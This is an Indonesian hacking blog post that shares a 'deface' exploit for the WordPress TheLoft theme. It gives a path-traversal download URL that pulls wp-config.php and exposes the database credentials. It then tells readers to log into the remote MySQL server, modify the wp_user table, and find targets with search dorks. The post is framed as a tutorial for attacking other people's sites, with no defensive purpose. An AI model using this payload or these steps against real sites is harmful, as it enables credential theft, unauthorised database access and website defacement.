Open top menu
Tuesday, September 16, 2014

Oke kali ini saya mau share exploit deface yang digunakan untuk deface wordpress. Namanya WordPress TheLoft Theme Arbitrary File Download Vulnerability. Termasuk exploit baru sih . Tinggal bagaimana dork yang kita gunakan .

Exploit :

http://localhost/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php



Buka file wp-config.php nya, disitu ada user dan password untuk login database.




Exploit



Jika db host nya localhost, cari yang lain lagi. cari yang pake url/server :p

Login MySQL, modif wp_user nya .



Sekian tutorial kali ini semoga bermanfaat.
Tagged
Different Themes
Written by Kcnewbie

Ikatlah ilmu dengan menuliskanya.

0 comments

Subscribe to: Post Comments (Atom)